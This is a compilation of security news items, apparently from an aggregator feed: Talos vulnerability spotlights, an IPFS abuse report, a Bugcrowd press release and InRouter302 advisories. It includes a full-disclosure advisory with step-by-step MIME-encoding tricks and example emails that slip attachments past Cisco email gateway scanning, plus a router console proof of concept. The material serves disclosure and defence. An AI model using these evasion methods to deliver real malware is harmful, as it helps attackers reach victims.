Marcin 'Icewall’ Noga of Cisco Talos discovered these vulnerabilities.
Cisco Talos recently discovered a class attribute double-free vulnerability in Microsoft Office.
Microsoft Office is a suite of tools used for productivity in both a corporate environment as well as by end-users. It offers a range of tools that

Tuesday, November 15, 2022 16:11

_Marcin 'Icewall’ Noga of Cisco Talos discovered these vulnerabilities._

Cisco Talos recently discovered a class attribute double-free vulnerability in Microsoft Office.

Microsoft Office is a suite of tools used for productivity in both a corporate environment as well as by end-users. It offers a range of tools that can be used for various purposes. Such as Excel for spreadsheets, Word for document editing, Outlook for email, PowerPoint for presentations, etc.

Talos has identified a double-free vulnerability in Microsoft Office Excel. TALOS-2022-1591 (CVE-2022-41106) allows an attacker to provide a malicious file to trigger a possible arbitrary code execution.

Cisco Talos worked with Microsoft to ensure that this issue was resolved and an update is available for affected customers, all in adherence to Cisco’s vulnerability disclosure policy.

Users are encouraged to update these affected products as soon as possible: Microsoft Office Microsoft Office Excel 2019 x86 - version 2207 build 15427.20210 and version 2202 build 14931.20660. Talos tested and confirmed these versions of Office could be exploited by these vulnerabilities.

The following Snort rules will detect exploitation attempts against these vulnerabilities: 60500-60501. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Vulnerability Spotlight: Microsoft Office class attribute double-free vulnerability

Cisco Secure Email Gateways, formerly known as Cisco Ironport Email Security Appliances, that are configured to detect malicious email attachments, can easily be circumvented. A remote attacker can leverage error tolerance and different MIME decoding capabilities of email clients, compared with the gateway, to evade detection of malicious payloads by anti-virus components on the gateway. This exploit was successfully tested with a zip file containing the Eicar test virus and Cisco Secure Email Gateways with AsyncOS 14.2.0-620, 14.0.0-698, and others. An affected Email Client was Mozilla Thunderbird 91.11.0 (64-bit).

  
This report is being published within a coordinated disclosure  
procedure.  The researcher has been in contact with the vendor  
but not received a satisfactory response within a given time  
frame.  As the attack complexity is low and exploits have already  
been published by a third party there must be no further delay  
in making the threads publicly known.

The researcher prefers not to take credit for their findings.

Evading Malware Detection by Cisco Secure Email Gateways  
========================================================

Cisco Secure Email Gateways, formerly known as Cisco Ironport  
Email Security Appliances, that are configured to detect  
malicious email attachments, can easily be circumvented.  
A remote attacker can leverage error tolerance and different  
MIME decoding capabilities of email clients, compared with the  
gateway, to evade detection of malicious payloads by anti-virus  
components on the gateway.

Method 1: Cloaked Base 64  
-------------------------

Step-by-step instruction:

1. Prepare an email with the malicious attachment with a  
   commonplace email client or employing standard MIME encoding,  
   using content-transfer-encoding base64.

2. Insert CR+LF line breaks at random places in the base64  
   encoded block so that the lines have different lengths,  
   but in a way that groups of four base64 characters (encoding  
   three bytes) stay together.  This is intended to evade naïve  
   heuristics to detect base64 even out of context, while not  
   violating the MIME standard.

3. Before the content-transfer-encoding header of the attachment,  
   insert another contradictory header "Content-Transfer-Encoding:  
   quoted-printable".  This does violate the MIME standard.

4. Remove any content-length headers of the message, if present.

A complete email prepared in this way may look like this:

----------------------- begin example -----------------------  
From: Mallory <mallory@example.com>  
To: Alice <alice@example.com>  
Date: Mon, 27 Jun 2022 18:29:22 +0200  
Subject: Your present  
Mime-Version: 1.0  
Message-Id: <b31a762c.8b44.63b67b5a@example.com>  
Content-type: multipart/mixed; boundary=boundary_ef5dcd26

--boundary_ef5dcd26  
Content-type: text/plain  
Content-Transfer-Encoding: quoted-printable

Here is your present.  
--boundary_ef5dcd26  
Content-type: application/octet-stream  
Content-Disposition: attachment; filename="present.zip"  
Content-Transfer-Encoding: quoted-printable  
Content-Transfer-Encoding: base64

UEsD  
BAoAAAAAAN2Q  
21Q8z1FoRAAAAEQAAAAJABwAZWlj  
YXIuY29tVVQJAAOh  
[... more similar lines skipped ...]  
CwAB  
BPgDAAAE6QMAAFBLBQYAAAAAAQABAE8A  
AACHAAAAAAA=  
--boundary_ef5dcd26--  
----------------------- end example -----------------------

Emails prepared in this fashion will pass through affected  
gateways with a verdict of being clean from malware, even if  
the attachment is otherwise easily recognizable malware such as  
the Eicar test virus.  Many popular email clients, on the other  
hand, will present the attached file and faithfully reproduce  
it upon saving.

Affected systems:

This exploit was successfully tested with a zip file containing  
the Eicar test virus and Cisco Secure Email Gateways with AsyncOS  
14.2.0-620, 14.0.0-698, and others. Affected Email Clients were  
Microsoft Outlook for Microsoft 365 MSO (Version 2210 Build  
16.0.15726.20070) 64-bit, Mozilla Thunderbird 91.11.0 (64-bit),  
Vivaldi 5.5.2805.42 (64-bit), Mutt 2.1.4-1ubuntu1.1, and others.

Method 2: yEnc Encoding  
-----------------------

yEncode or short yEnc is an encoding typically employed by  
usenet clients.  Some email clients are capable of decoding MIME  
parts with this encoding, too.  A remote attacker using this  
encoding for a malicious email attachment will evade malware  
detection by affected gateways but may succeed in delivering  
the payload to victims if they use particular email clients.  
Other email clients will store the attachment in an undecoded  
and thus not directly harmful form.

An email prepared in this way may look like this:

----------------------- begin example -----------------------  
From: Mallory <mallory@example.com>  
To: Alice <alice@example.com>  
Date: Mon, 27 Jun 2022 18:29:22 +0200  
Subject: Your present  
Mime-Version: 1.0  
Message-Id: <b31a762c.8b44.63b67b5a@example.com>  
Content-type: multipart/mixed; boundary=boundary_ef5dcd26

--boundary_ef5dcd26  
Content-type: text/plain  
Content-Transfer-Encoding: quoted-printable

Here is your present.  
--boundary_ef5dcd26  
Content-type: application/octet-stream  
Content-Disposition: attachment; filename="present.zip"  
Content-Transfer-Encoding: x-yencode

=ybegin line=128 size=236 name=file.bin  
[... binary content skipped ...]  
=yend size=236  
--boundary_ef5dcd26--  
----------------------- end example -----------------------

Affected Systems:

This exploit was successfully tested with a zip file containing  
the Eicar test virus and Cisco Secure Email Gateways with AsyncOS  
14.2.0-620, 14.0.0-698, and others.  An affected Email Client  
was Mozilla Thunderbird 91.11.0 (64-bit).

Method 3: Cloaked Quoted-Printable  
----------------------------------

This method is similar to method 1 with the roles of  
quoted-printable and base64 swapped.  The payload has to  
be encoded quoted-printable, but with each byte rather than  
just non-printable bytes encoded and on separate lines with  
continuation.  The contradicting headers now come in the order  
base64, quoted-printable.

An email prepared in this way may look like this:

----------------------- begin example -----------------------  
From: Mallory <mallory@example.com>  
To: Alice <alice@example.com>  
Date: Mon, 27 Jun 2022 18:29:22 +0200  
Subject: Your present  
Mime-Version: 1.0  
Message-Id: <b31a762c.8b44.63b67b5a@example.com>  
Content-type: multipart/mixed; boundary=boundary_ef5dcd26

--boundary_ef5dcd26  
Content-type: text/plain  
Content-Transfer-Encoding: quoted-printable

Here is your present.  
--boundary_ef5dcd26  
Content-type: application/octet-stream  
Content-Disposition: attachment; filename="present.zip"  
Content-Transfer-Encoding: base64  
Content-Transfer-Encoding: quoted-printable

=50=  
=4B=  
=03=  
=04=  
[... more similar lines skipped ...]  
=00=  
=00=  
=00=  
=00=  
--boundary_ef5dcd26--  
----------------------- end example -----------------------

Affected Systems:

This exploit was successfully tested with a zip file containing  
the Eicar test virus and Cisco Secure Email Gateways with AsyncOS  
14.2.0-620, 14.0.0-698, and others.  Affected Email Clients  
were Vivaldi 5.5.2805.42 (64-bit) and Mutt 2.1.4-1ubuntu1.1.

References  
----------

Code employing the methods presented here and many similar  
techniques to manipulate MIME encoding can be found on GitHub:  
https://github.com/noxxi/mime-is-broken

Cisco has published an advisory with a workaround  
facilitating an undocumented feature of the gateway that  
can be used to block incorrect MIME.  This mitigates  
many cases of the test suite from GitHub, but not all,  
particularly not the ones presented in this report.  URL:  
https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwc34679

End of the report.

Cisco Secure Email Gateway Malware Detection Evasion

**SAN FRANCISCO, Nov. 15, 2022 /PRNewswire/ —** Bugcrowd, the leader in crowdsourced cybersecurity, today announced that CREST, the gold standard for quality assurance accreditation in the cybersecurity industry, has named the company as a CREST Accredited provider for penetration testing. The certification acknowledges that Bugcrowd meets the CREST standards for:

*   Company operating procedures and standards
*   Testing by trusted, reliable, qualified pentesters
*   Ethical and effective testing procedures
*   Protecting customer data

"CREST accreditation is widely considered a proof point for thorough, effective, reliable penetration testing, especially in regulated industries like Financial Services and Public Sector," said Casey Ellis, Founder, Chairperson and CTO, Bugcrowd. "We're proud to have earned this distinction for Bugcrowd Penetration Testing."

"We are pleased to welcome Bugcrowd as a CREST member company," said Rowland Johnson, president of CREST. "Bugcrowd's accreditation for providing penetration testing in the UK gives its customers added reassurance that its services meet the very highest standards because CREST accreditation requires rigorous assessment of business processes, data security and testing methodologies. This puts Bugcrowd in a strong position, along with other CREST members, to take advantage of the growing demand for high quality penetration testing services."

**About CREST**

CREST is an international not-for-profit accreditation and certification body that represents and supports the technical information security market. CREST provides internationally recognised accreditations for organisations and professional level certifications for individuals providing vulnerability assessment, penetration testing, cyber incident response, threat intelligence services and Security Operations Centre (SOC) services. All CREST member companies undergo regular and stringent assessment; while CREST-qualified individuals have to pass rigorous examinations to demonstrate knowledge, skill and competence. CREST is governed by elected Councils of experienced security professionals who also promote, develop and support awareness, ethics and standards within the cyber security marketplace.

**About Bugcrowd**

Today's organizations demand a proactive approach to cybersecurity that uncovers hidden vulnerabilities in the attack surface, before malicious hackers find them. Bugcrowd offers the only multi-solution platform for crowdsourced security that orchestrates data, technology, and human intelligence to find risks that other approaches commonly miss. With that unique approach, the Bugcrowd Security Knowledge Platform™ enables businesses to do everything proactively possible to protect their organization, reputation, and customers from being blind-sided by cyberattacks through Bug Bounty, Vulnerability Disclosure Programs, Penetration Testing, and Attack Surface Management. Based in San Francisco, Bugcrowd is backed by Blackbird Ventures, Costanoa Ventures, Industry Ventures, Paladin Capital Group, Rally Ventures, Salesforce Ventures and Triangle Peak Partners. Learn more at www.bugcrowd.com.

Bugcrowd Earns CREST Accreditation for Pen Testing

The team uses a secret technique to locate AlphaBay’s server. But just as the operation heats up, the agents have an unexpected run-in with their target.

The Hunt for the Dark Web’s Biggest Kingpin, Part 4: Face to Face

Military veterans tend to have the kind of skills that would make them effective cybersecurity professionals, but making the transition is not that easy.

Organizations are struggling to fill cybersecurity positions. That may be because they aren't utilizing security staff efficiently and so they need more people. It could also just be that the increase in threats means there is more work to be done. For whatever reason, organizations are casting a wider net to find talented and skilled professionals to staff up their security teams, and they are increasingly courting former military personnel.

"The level of training these individuals receive to protect our most critical infrastructure and carry out cyber operations against our adversaries goes far beyond most private sector offerings and is highly transferable to a career in the private sector," Carl Wright, chief commercial officer at AttackIQ, told Dark Reading earlier this year.

As an employee group, veterans exhibit characteristics that make them particularly well-suited for the cybersecurity workforce, the National Institute for Standards and Technology wrote in a special publication (SP1500-16) on helping veterans transition into private IT sector roles. "Their military experience has provided them with years of cybersecurity experience in 'live fire' scenarios, working on systems comparable to those found in the civilian work environment," according to the document. Veterans already possessing security clearances will also be very attractive as job candidates.

They may also have the requisite security certifications. Vendor-neutral certifications are particularly ubiquitous among military personnel, according to the most recent Cybersecurity Workforce Study from (ISC)2.

However, many veterans find making that switch from the military to private sector can be difficult. Veteran-hiring initiatives exist, both inside and outside of industry, but many of these programs are not discovered until too late, NIST said. "Veterans may not find information about these programs, may not see how their military experience translates to job-readiness in the private sector, or may need assistance in gaining certifications necessary to qualify for some private-sector cybersecurity roles," NIST said.

Veterans who did not work in cybersecurity while in the military still have valuable skills that they bring to the field, however. The military emphasizes teamwork, adaptability, and responsibility, all traits that security professionals need to have. Military personnel are also trained in careful decision-making even under extreme pressure using the available information. For example, Josh Smith, a cybersecurity analyst at Nuspire, told Dark Reading earlier this year how the same skills he relied on in the US Navy to ingest data, analyze what was received, disseminate the information to appropriate parties, and take action based on the findings translate to cybersecurity roles.

Earlier this year, the White House National Cyber Workforce and Education Summit issued a call to action to increase cybersecurity education and training opportunities. One of the announcements was to encourage more apprenticeship programs to help develop and train the cybersecurity workforce. In the months since, there have been a number of initiatives from cybersecurity organizations, including SANS Institute.

Many colleges and universities have training programs specifically to give veterans hands-on experience in various areas. Cybersecurity training platform Cybrary said this week it is partnering with VetSec, a community of over 3,300 veterans working in or transitioning into cybersecurity, and TechVets, a bridge service for moving veterans, service leavers, reservists, and their families into IT careers.

Private companies are partnering with veterans' organizations as well. For example, consulting giant Accenture offers a military veteran technology program, as does networking titan Cisco. Microsoft Software and Systems Academy (MSSA) was created to provide transitioning service members and veterans with career skills needed in the modern tech industry. Arctic Wolf, for example, works with the Department of Defense's SkillBridge program to provide a path to reentry into the workforce for those leaving the military.

Such efforts seem to be paying off. According to the US Department of Labor, unemployment among veterans is running nearly a full percentage point below the general population; in October 2022, only 2.7% of veterans were unemployed, compared to 3.6% overall.

Why Cybersecurity Should Highlight Veteran-Hiring Programs

Aleksandar Nikolic of Cisco Talos discovered these vulnerabilities.
Cisco Talos recently discovered several use-after-free vulnerabilities in Foxit Reader that could lead to arbitrary code execution.
The Foxit Reader is one of the most popular PDF document readers, which aims to have feature parity with Adobe’s Acrobat Reader. As

Thursday, November 10, 2022 15:11

_Aleksandar Nikolic of Cisco Talos discovered these vulnerabilities._

Cisco Talos recently discovered several use-after-free vulnerabilities in Foxit Reader that could lead to arbitrary code execution.

The Foxit Reader is one of the most popular PDF document readers, which aims to have feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface.

Talos has identified four use-after-free vulnerabilities in Foxit Reader. The reader includes Javascript support to enable dynamic documents and multimedia content, which can be viewed interactively. A specially crafted PDF document can trigger the reuse of previously freed memory, which can lead to arbitrary code execution. An attacker needs to trick a user into opening a malicious file to trigger these vulnerabilities.

TALOS-2022-1600 (CVE-2022-32774)

TALOS-2022-1601 (CVE-2022-38097)

TALOS-2022-1602 (CVE-2022-37332)

TALOS-2022-1614 (CVE-2022-40129)

Cisco Talos worked with Foxit to ensure that these issues are resolved and an update is available for affected customers, all in adherence to Cisco’s vulnerability disclosure policy.

Users are encouraged to update these affected products as soon as possible: Foxit Reader 12.0.1.12430. Talos tested and confirmed these versions of the reader could be exploited by these vulnerabilities.

The following Snort rules will detect exploitation attempts against these vulnerabilities: 60594-60595, 60604-60605, 60592-60593 and 60619-60620. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Vulnerability Spotlight: Use-after-free vulnerabilities in Foxit Reader could lead to arbitrary code execution

Cyberattackers like IPFS because it is resilient to content blocking and takedown efforts.

As has happened with other Web technologies designed for legitimate use, the InterPlanetary File System (IPFS) peer-to-peer network for storing and accessing content in a decentralized fashion has become a potent new weapon for cyberattacks.

Researchers from Cisco Talos this week reported observing multiple malicious campaigns leveraging the IPFS to host phishing kits and malware payloads. For many attackers, the IPFS has become the equivalent of a bulletproof hosting provider that is mostly impervious to takedown efforts, Talos said. Complicating matters for defenders is the fact that the IPFS is often used for legitimate purposes. So, differentiating between benign and malicious IPFS activity is another challenge, the security vendor said.

"Organizations should become familiar with these new technologies and how they are being leveraged by threat actors to defend against new techniques that use them," Talos said in a report summarizing the threat.

**Growing Threat**

This marks at least the second time in recent months that researchers have sounded the alarm on IPFS becoming a hotbed of cybercrime activity.

In July, Trustwave's SpiderLabs noted how its researchers had identified more than 3,000 emails with phishing URLs hosted in the IPFS in a three-month period. Phishing pages that it observed on the IPFS included those that spoofed Microsoft Outlook login pages, Google domains and cloud storage services such as Filebase.io and nftstorage.link. "Phishing techniques have taken a leap by utilizing the concept of decentralized cloud services using IPFS," Trustwave said. The growing use of IPFS by many file storage, Web hosting, and cloud service companies means that attackers have a lot more flexibility in creating new phishing URLs that cannot be easily blocked, the security vendor said.

IPFS is a peer-to-peer file sharing system that Protocol Labs launched in 2015. The network is designed to allow decentralized storage of content. Content stored in the IPFS is mirrored across multiple nodes, or systems that participate in the network. Individuals and others can use IPFS to store different types of data including webpages, files, NFTs, and documents.

Resources stored on the IPFS are assigned unique identifiers. Users can employ the identifier to access the content via IPFS clients or gateways, which are like gateways for accessing content on the Tor network. Because content is mirrored on IPFS, it is always available even if one node goes down.

This has made the IPFS an attractive option for hosting phishing kits and malware for cybercriminals. Because content on the IPFS does not have a static IP address, it cannot be blocked using standard IP blocking and blacklisting mechanisms. Similarly, taking down a node containing phishing pages and malware does little to neutralize a threat because the content is mirrored across multiple nodes. There is also no central authority on the IPFS that law enforcement or security vendors can contact to take down a phishing or malware distributing site.

In an example of how attackers are abusing IPFS, Talos pointed to a phishing campaign in which victims receive an email with an attached PDF that purports to be associated with the DocuSign document signing service. When a user clicks on the "Review Document" link, they are directed to a webpage that appears to be a legitimate Microsoft authentication page but is really a credential-harvesting page hosted on the IPFS network.

In situations where an IPFS gateway might recognize the resource being requested as malicious and block access, attacker simply change the IPFS gateway that is used to retrieve the content, Talos said.

**Phishing Not the Only Threat**

Phishing pages are not the only threat. A growing number of attackers are also leveraging the peer-to-peer network to distribute malicious payloads.

In one campaign that Talos researchers observed, the attacker sent victims a phishing email with a ZIP attachment containing a malware dropper in the form of a PE32 executable. When run, the downloader would reach out to an IPFS gateway and retrieve a second-stage malware payload hosted on the peer-to-peer network. The attack chain ended with the Agent Tesla remote-access Trojan getting dropped on the victim's system.

Talos researchers also found a destructive, disk-wiping malware tool and a full-featured information-stealer called Hannabi Grabber hosted in IPFS nodes.

"Many new Web3 technologies have emerged recently, attempting to provide valuable functionality to users," Talos said in the report. "As these technologies have continued to see increased adoption for legitimate purposes, they have begun to be leveraged by adversaries as well."

The researchers expect the trend to gain momentum as more threat actors realize the IPFS is resilient to content moderation and takedown efforts.

"Organizations should be aware of how these newly emerging technologies are being actively used across the threat landscape and evaluate how to best implement security controls to prevent or detect successful attacks in their environments," the vendor said.

InterPlanetary File System Increasingly Weaponized for Phishing, Malware Delivery

The firmware of InHand Networks InRouter302 V3.5.45 introduces fixes for TALOS-2022-1472 and TALOS-2022-1474. The fixes are incomplete. An attacker can still perform, respectively, a privilege escalation and an information disclosure vulnerability.

**SUMMARY**

The firmware of InHand Networks InRouter302 V3.5.45 introduces fixes for TALOS-2022-1472 and TALOS-2022-1474. The fixes are incomplete. An attacker can still perform, respectively, a privilege escalation and an information disclosure vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

InHand Networks InRouter302 V3.5.45

**PRODUCT URLS**

InRouter302 - https://www.inhandnetworks.com/products/inrouter300.html

**CVSSv3 SCORE**

7.4 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L

**CWE**

CWE-284 - Improper Access Control

**DETAILS**

The InRouter302 is an industrial LTE router. It features remote management functionalities and several security protection mechanisms, such as: VPN technologies, firewall functionalities, authorization management and several other features.

The patches introduced for TALOS-2022-1472 and TALOS-2022-1474 were not effective.

**TIMELINE**

2022-06-07 - Vendor Disclosure  
2022-10-25 - Vendor Patch Release  
2022-10-27 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2022-25932: TALOS-2022-1523 || Cisco Talos Intelligence Group

A leftover debug code vulnerability exists in the httpd port 4444 upload.cgi functionality of InHand Networks InRouter302 V3.5.45. A specially-crafted HTTP request can lead to arbitrary file deletion. An attacker can send an HTTP request to trigger this vulnerability.

**SUMMARY**

A leftover debug code vulnerability exists in the httpd port 4444 upload.cgi functionality of InHand Networks InRouter302 V3.5.45. A specially-crafted HTTP request can lead to arbitrary file deletion. An attacker can send an HTTP request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

InHand Networks InRouter302 V3.5.45

**PRODUCT URLS**

InRouter302 - https://www.inhandnetworks.com/products/inrouter300.html

**CVSSv3 SCORE**

6.5 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H

**CWE**

CWE-489 - Leftover Debug Code

**DETAILS**

The InRouter302 is an industrial LTE router. It features remote management functionalities and several security protection mechanisms, such as: VPN technologies, firewall functionalities, authorization management and several other features.

One of the ports the httpd protocol listens to is 4444. This port seems to have different purposes. In some APIs it offers more functionalities, in others it is used to managed the APIs in headless mode. But in some APIs, that port is used to trigger some debug code that could perform certain actions outside the scope of the API.

The upload.cgi API will execute mainly two functions: upload.cgi_input that will parse the POST request, and upload.cgi_output that will use the parsed input to perform the actual API request and return the output, if required. The upload.cgi_input function:

    void upload.cgi_input(char* cgi_func_name,uint CONTENT_LENGTH,char *BOUNDARY)
    
    {
      [...]
    
      if ((post == 0) || (BOUNDARY == (char *)0x0)) {
        syslog(4,"not POST or no boundary for multipart upload!");
      }
      else {
        boundary_len = strlen(BOUNDARY);
        if ((int)CONTENT_LENGTH < 0x400000) {
          syslog(7,"wi_upload: %s",cgi_func_name);
          if (gl_server_port != 4444) {                                                                     [1]
            webcgi_init(0,cgi_func_name);                                                                   [2]
          }
        [...]
    }
    

The two main variables that are going to be parsed, and later used in the upload.cgi_output, are type and filename. The upload.cgi_input function is also responsible for creating a temporary file with the content of the provided one. The file /tmp/<provided_filename> is opened and filled with the provided content. The filename variable goes through different checks in order to prevent path traversal vulnerabilities.

Later, in upload.cgi_output, based on the type variable provided, different actions could be performed. Eventually the temporary file created will be removed. The upload.cgi_output function:

    void upload.cgi_output(void)
    
    {
    
      [...]
      type = (char *)webcgi_get("type");
      filename = (char *)webcgi_get("filename");
      [...]
    }
    

The httpd webserver parses some request variables, like the ones specified in the URL. In upload.cgi_input, at [1], it is checked if the request was for the httpd webserver that listens at port 4444. If this is is the case, the already-parsed variables are not removed. This can inject arbitrary values in type and filename variables, bypassing the checks performed in upload.cgi_input. Then the upload.cgi_output will use the parsed variables, without knowing that those were the ones specified in the URL and not parsed by upload.cgi_input. This problem can lead to a delete arbitrary file vulnerability, exploiting the cleanup procedure, due to the upload.cgi_output removing the “temporary” file /tmp/<provided_filename>. Where <provided_filename>, if specified in the URL, is an arbitrary value specified in the filename parameter.

**TIMELINE**

2022-06-07 - Vendor Disclosure  
2022-10-25 - Vendor Patch Release  
2022-10-27 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2022-29888: TALOS-2022-1522 || Cisco Talos Intelligence Group

A leftover debug code vulnerability exists in the console support functionality of InHand Networks InRouter302 V3.5.45. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger this vulnerability.

**SUMMARY**

A leftover debug code vulnerability exists in the console support functionality of InHand Networks InRouter302 V3.5.45. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

InHand Networks InRouter302 V3.5.45

**PRODUCT URLS**

InRouter302 - https://www.inhandnetworks.com/products/inrouter300.html

**CVSSv3 SCORE**

6.5 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

**CWE**

CWE-489 - Leftover Debug Code

**DETAILS**

The InRouter302 is an industrial LTE router. It features remote management functionalities and several security protection mechanisms, such as: VPN technologies, firewall functionalities, authorization management and several other features.

The InRouter302 offers telnet and sshd services. Both, when provided with the correct credentials, will allow access to the Router console.

Here is the prompt after the login:

    ************************************************
               Welcome to Router console
          Inhand
          Copyright @2001-2022, Beijing InHand Networks Co., Ltd.
          http://www.inhandnetworks.com
    ------------------------------------------------
    Model                : IR302-WLAN
    Serial Number        : RF3022141057203
    Description          : www.inhandnetworks.com
    Current Version      : V3.5.45
    Current Bootloader Version : 1.1.3.r4955
    ------------------------------------------------
    get help for commands
    ------------------------------------------------
    type '?' for detail help at any point
    ================================================
      help           -- get help for commands
      language       -- Set language
      show           -- show system information
      exit           -- exit current mode/console
      ping           -- ping test
      comredirect    -- COM redirector
      telnet         -- telnet to a host
      traceroute     -- trace route to a host
      enable         -- turn on privileged commands
    Router>
    

The Router console contains a command, called support, that is not listed among the available functionalities. This is probably a leftover debug code. This command allows to enable or disable the inhand command, leading to enable advisory TALOS-2022-1477 again.

**Exploit Proof of Concept**

The command allows to enable the inhand command in the router console, specifying enable as argument:

    Router> inhand
    Router> support
    0*wsuppP�)w
    ================================================
    Arguments:
    enable
    disable
    Router> support enable
    Router> inhand
    input password:
    

**TIMELINE**

2022-06-07 - Vendor Disclosure  
2022-10-25 - Vendor Patch Release  
2022-10-27 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

Tag

#cisco